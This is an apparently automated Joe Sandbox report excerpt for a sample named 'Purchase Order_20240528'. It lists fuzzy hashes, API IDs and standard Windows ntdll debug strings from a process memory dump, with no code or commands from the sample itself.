                                  • Opcode Fuzzy Hash: 324bfc72174669b4f618398fc257dbf04ed79adc03d14d42a2e77332e3665723
                                  • Instruction Fuzzy Hash: D151E2B5A00646BFCF34DF9DCDA097EBBFDAB44200B04846DE596D7682E774EA408760
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: HEAP:
                                  • API String ID: 3446177414-2466845122
                                  • Opcode ID: 84be7cb3cdc1ecf358aefa0c3e049658163a609acd6ba99aa642b459cf7f8667
                                  • Instruction ID: e3794d092140565e3aff9fcc419b5156a765af333a8712dcd6a9b209437afd81
                                  • Opcode Fuzzy Hash: 84be7cb3cdc1ecf358aefa0c3e049658163a609acd6ba99aa642b459cf7f8667
                                  • Instruction Fuzzy Hash: 0DA1AC75A143128FD715CE68CCD4A6ABBE5BF88310F09456DEA46DB311EB30EC86CB91
                                  Strings
                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 016546FC
                                  • Execute=1, xrefs: 01654713
                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01654725
                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01654655
                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 01654787
                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01654742
                                  • ExecuteOptions, xrefs: 016546A0
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                  • API String ID: 0-484625025
                                  • Opcode ID: 0b35cf51ed66751b3858ac00014bd42a21666f700ef587026c10f314fddaa48c
                                  • Instruction ID: 1981ac7a04560acc87b59ce512cf86aee5810d4ad5dd66cb0b8a29404f7ff7ca
                                  • Opcode Fuzzy Hash: 0b35cf51ed66751b3858ac00014bd42a21666f700ef587026c10f314fddaa48c
                                  • Instruction Fuzzy Hash: AC512C31A0022ABAEF11AFA9DC95FBD77B9EF14700F0804DDD505AB285EB719A418F54
                                  Strings
                                  • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 01647AE6
                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 016479FA
                                  • SsHd, xrefs: 015FA3E4
                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 016479D5
                                  • Actx , xrefs: 01647A0C, 01647A73
                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 016479D0, 016479F5
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                  • API String ID: 0-1988757188
                                  • Opcode ID: 33944770fe3bb794e261b184ee7a4574f1dd712d57e90aa492a6517e86b6abb7
                                  • Instruction ID: 1bdefb15e18437b7a228223c4f0019739ecd8c79a7d22ee3b92d7f9e82dea5c9
                                  • Opcode Fuzzy Hash: 33944770fe3bb794e261b184ee7a4574f1dd712d57e90aa492a6517e86b6abb7
                                  • Instruction Fuzzy Hash: 09E1C2706043428FE725CE28C898B6ABBE1BB84354F144A2DEA69CF3D1D731D985CB53
                                  APIs
                                  Strings
                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 0164936B
                                  • GsHd, xrefs: 015FD874
                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 01649346
                                  • Actx , xrefs: 01649508
                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 01649341, 01649366
                                  • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 01649565
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                  • API String ID: 3446177414-2196497285
                                  • Opcode ID: 81c34c3b587e35574ffe0b7664f269de8dd1b1b53d41173db5f09295bf1a2558
                                  • Instruction ID: fd56919ff30e4df91eb93b82542bfcb023546f46c733461664b9df3dd423c379
                                  • Opcode Fuzzy Hash: 81c34c3b587e35574ffe0b7664f269de8dd1b1b53d41173db5f09295bf1a2558
                                  • Instruction Fuzzy Hash: A3E1B2716043428FDB25CF98C980B6BBBF5BF89318F044A2DEA958F281D771D944CB92
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                  • API String ID: 3446177414-1745908468
                                  • Opcode ID: 6da6a55e0593b76096857e83953e63ecd63894690d2d3153b86f861e5041fdf4
                                  • Instruction ID: 95b653ba489f176456f002eee2158e363daa7d359650e6002cf675b6659cc7fb
                                  • Opcode Fuzzy Hash: 6da6a55e0593b76096857e83953e63ecd63894690d2d3153b86f861e5041fdf4
                                  • Instruction Fuzzy Hash: 8E912131900686DFDB22EF68CC40AADBBF2FF59714F19829DE545AB351CB359881CB14
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                  • API String ID: 3446177414-4227709934
                                  • Opcode ID: 4aa862a5196271d521e6ad8a78fa8c07fc92024ce2e545280de74be830a4393c
                                  • Instruction ID: d7f97bad46ef28367247bbe8f22ef0eb95d3eb225a78aca98f3cbb033fd014df
                                  • Opcode Fuzzy Hash: 4aa862a5196271d521e6ad8a78fa8c07fc92024ce2e545280de74be830a4393c
                                  • Instruction Fuzzy Hash: E6418AB5A01209ABDB51DF99CD80AEEBBB6BF48B04F140199ED04AB341D7719911DBA0
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                  • API String ID: 3446177414-3492000579
                                  • Opcode ID: 1c00937ce617dd32a6acaa4c376a9c76d59469c061b98150b6372f4479c862e3
                                  • Instruction ID: 7e2447e96a08ea9553e68eb194547b896c2c63cedc90381acd9986a1464798ba
                                  • Opcode Fuzzy Hash: 1c00937ce617dd32a6acaa4c376a9c76d59469c061b98150b6372f4479c862e3
                                  • Instruction Fuzzy Hash: 8571D031A01286DFDB26EF6CD8406ADFBF2FF8A714F088199E5459B752CB319940CB94
                                  APIs
                                  Strings
                                  • minkernel\ntdll\ldrinit.c, xrefs: 01639AC5, 01639B06
                                  • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 01639AF6
                                  • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 01639AB4
                                  • LdrpLoadShimEngine, xrefs: 01639ABB, 01639AFC
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimuser$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                  • API String ID: 3446177414-3589223738
                                  • Opcode ID: 30438efc9d4246ed39a4e3fdd0cda0dc519e9cf1f0fb4cd9dc516539ee6baab8
                                  • Instruction ID: 44de2c9e1289b4016867d91f9069609f2cdfc0d559439a7c2350d17fb51f7ba7
                                  • Opcode Fuzzy Hash: 30438efc9d4246ed39a4e3fdd0cda0dc519e9cf1f0fb4cd9dc516539ee6baab8
                                  • Instruction Fuzzy Hash: C6513532B013599FDB28EBACCC54AED7BB2BB80304F050119E501AF289DBB0AC51CB94
                                  APIs
                                  • RtlDebugPrintTimes.NTDLL ref: 0160D959
                                    • Part of subcall function 015E4859: RtlDebugPrintTimes.NTDLL ref: 015E48F7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                  • API String ID: 3446177414-1975516107
                                  • Opcode ID: c4a0d6e7b0f1bdcea902e3f032b66100b3c4ffc37a9f6af8f172f5cdc737df23
                                  • Instruction ID: aa04a36ccd5bf7777a14bebe83e05db94fd30421ddcfbbc8007b93dd8035133d
                                  • Opcode Fuzzy Hash: c4a0d6e7b0f1bdcea902e3f032b66100b3c4ffc37a9f6af8f172f5cdc737df23
                                  • Instruction Fuzzy Hash: 9F51DE72E002469FDB2ADFE8CC847AEBBB2BF44314F15525DC9056B2C1D770AA52CB90
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                  • API String ID: 3446177414-3224558752
                                  • Opcode ID: fa26bb56f94c7fefd64805a0a63c4bbd8a8841a5894a444d2155424e16d7ef66
                                  • Instruction ID: 35c15febab323fb3368af070afdf80630a7596b44ffd478444f332017b2af844
                                  • Opcode Fuzzy Hash: fa26bb56f94c7fefd64805a0a63c4bbd8a8841a5894a444d2155424e16d7ef66
                                  • Instruction Fuzzy Hash: 56415770600A46DFD72ADFACCC85BAAB7A5FF45324F0041ACD5018B3D1CB749880C790
                                  APIs
                                  Strings
                                  • HEAP: , xrefs: 0168F15D
                                  • ---------------------------------------, xrefs: 0168F279
                                  • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 0168F263
                                  • Entry Heap Size , xrefs: 0168F26D
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                  • API String ID: 3446177414-1102453626
                                  • Opcode ID: 77fdef30ecc1e9b8c34721b4928c82c41c0723b954b517919502198c268063d1
                                  • Instruction ID: a83b41a25f83c46881bc94c303fef89ac3e6e5d1ca81501939f0ff281bdcb98f
                                  • Opcode Fuzzy Hash: 77fdef30ecc1e9b8c34721b4928c82c41c0723b954b517919502198c268063d1
                                  • Instruction Fuzzy Hash: 3441D039A01216DFCB25EF58DC90966BBF2FF4A34471682A9D448DB715CB31EC42CB80
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                  • API String ID: 3446177414-1222099010
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  APIs
                                  Strings
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-$0$0
                                  • API String ID: 1302938615-699404926
                                  APIs
                                  Strings
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: $$@
                                  • API String ID: 3446177414-1194432280
                                  APIs
                                  Strings
                                  • LdrpFindDllActivationContext, xrefs: 01653636, 01653662
                                  • Querying the active activation context failed with status 0x%08lx, xrefs: 0165365C
                                  • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0165362F
                                  • minkernel\ntdll\ldrsnap.c, xrefs: 01653640, 0165366C
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                  • API String ID: 3446177414-3779518884
                                  APIs
                                  Strings
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$[$]:%u
                                  • API String ID: 48624451-2819853543
                                  APIs
                                  Strings
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: 0I8w$0I8w$0I8w$X
                                  • API String ID: 3446177414-113150377
                                  Strings
                                  • RTL: Re-Waiting, xrefs: 0165031E
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 016502BD
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 016502E7
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                  • API String ID: 0-2474120054
                                  APIs
                                  Strings
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: (HeapHandle != NULL)$HEAP: $HEAP[%wZ]:
                                  • API String ID: 3446177414-3610490719
                                  APIs
                                  • RtlDebugPrintTimes.NTDLL ref: 016B8B03
                                  • RtlDebugPrintTimes.NTDLL ref: 016B8B5B
                                    • Part of subcall function 01622B60: LdrInitializeThunk.NTDLL ref: 01622B6A
                                  Strings
                                  Similarity
                                  • API ID: DebugPrintTimes$InitializeThunk
                                  • String ID: $File
                                  • API String ID: 1259822791-2412145507
                                  APIs
                                  Strings
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                  • API String ID: 3446177414-2283098728
                                  Strings
                                  • RTL: Re-Waiting, xrefs: 01657BAC
                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01657B7F
                                  • RTL: Resource at %p, xrefs: 01657B8E
                                  Similarity
                                  • API ID:
                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 0-871070163
                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0165728C
                                  Strings
                                  • RTL: Re-Waiting, xrefs: 016572C1
                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01657294
                                  • RTL: Resource at %p, xrefs: 016572A3
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                  • API String ID: 885266447-605551621
                                  APIs
                                  Strings
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$]:%u
                                  • API String ID: 48624451-3050659472
                                  APIs
                                  Strings
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID: Wow64 Emulation Layer
                                  • API String ID: 3446177414-921169906
                                  APIs
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  APIs
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  APIs
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  APIs
                                  Similarity
                                  • API ID: DebugPrintTimes
                                  • String ID:
                                  • API String ID: 3446177414-0
                                  • Opcode ID: c4d7a5c32caf0f88bbdf4fd4812d07c888012ca4d7f5f6c60e363937e123d80d
                                  • Instruction ID: 8120f0c4963e498d03aebbf591274f192c42312893f492e0a5a99e88e41d546f
                                  • Opcode Fuzzy Hash: c4d7a5c32caf0f88bbdf4fd4812d07c888012ca4d7f5f6c60e363937e123d80d
                                  • Instruction Fuzzy Hash: 815133B2E012199FEF48CF99DC84ADDBBB1BF48355F1880AAE905AB250D7349901CF94
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes$BaseInitThreadThunk
                                  • String ID:
                                  • API String ID: 4281723722-0
                                  • Opcode ID: ef18badb8d720ad94d0d7298fcc80b6609248fbc19025349047bf61d733a9146
                                  • Instruction ID: 9719e165488a6a9fcaa28635ed07c78378bbcd0b9291337901f0e77cfd5348b1
                                  • Opcode Fuzzy Hash: ef18badb8d720ad94d0d7298fcc80b6609248fbc19025349047bf61d733a9146
                                  • Instruction Fuzzy Hash: E2312572E01229AFCF65DFA8EC84A9DBBF1BB48720F10416AE911B7394DB305940CF54
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: @
                                  • API String ID: 0-2766056989
                                  • Opcode ID: 150ee5c3e63e2bcb43cd267ae5675ab9ad7f0104802fa8051ee08dd4f89d8a95
                                  • Instruction ID: ea30baad83805cca84b095ec33144adde5b2e863ff3fd5e3e81ea6e310bdcdae
                                  • Opcode Fuzzy Hash: 150ee5c3e63e2bcb43cd267ae5675ab9ad7f0104802fa8051ee08dd4f89d8a95
                                  • Instruction Fuzzy Hash: 1E325B74D1026ADFDB29CF64C848BEDBBF0BB18308F0085E9D559AB241E7759A84CF91
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-
                                  • API String ID: 1302938615-2137968064
                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction ID: 9591bdc3fd59376ccaabae84d226e5aeb8890c306417d7c80c4526755bed63db
                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                  • Instruction Fuzzy Hash: 5291D271E04A3A9BEB24CF6DCC81EBEBBA5AF64320F14451AE955A73C0D7349941CF21
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 0$Flst
                                  • API String ID: 0-758220159
                                  • Opcode ID: 76b6e1bb5252bc58f86d0dec63b733b784413ba3619ca746a4cbf9171e4593d4
                                  • Instruction ID: ac15735f88d0e341445941f9e595df075614d1fc9eb92bd6d2b03f123ab2b893
                                  • Opcode Fuzzy Hash: 76b6e1bb5252bc58f86d0dec63b733b784413ba3619ca746a4cbf9171e4593d4
                                  • Instruction Fuzzy Hash: 80519CB2E002158BCF26CF99DC84669FBF4FF44758F59802ED4099B355EB709985CB80
                                  APIs
                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 0166CFBD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: CallFilterFunc@8
                                  • String ID: @$@4Cw@4Cw
                                  • API String ID: 4062629308-3101775584
                                  • Opcode ID: 546017c3789685b8860d2a26a3e5afef0f7f8ab98e776ee60b10573ca6b39e65
                                  • Instruction ID: d2412a02ca1abe63d3aeaf2b7f3fda4ba33a1310ef701a7c667a90e58fc584a5
                                  • Opcode Fuzzy Hash: 546017c3789685b8860d2a26a3e5afef0f7f8ab98e776ee60b10573ca6b39e65
                                  • Instruction Fuzzy Hash: EB418EB1E0061ADFDB219FA9CD40AAABBB8FF94700F00402EEA45DB354D774D801CB65
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2210139228.00000000015B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 015B0000, based on PE: true
                                  • Associated: 00000003.00000002.2210139228.00000000016D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.00000000016DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000003.00000002.2210139228.000000000174E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_15b0000_Purchase Order_20240528.jbxd
                                  Similarity
                                  • API ID: DebugPrintTimes
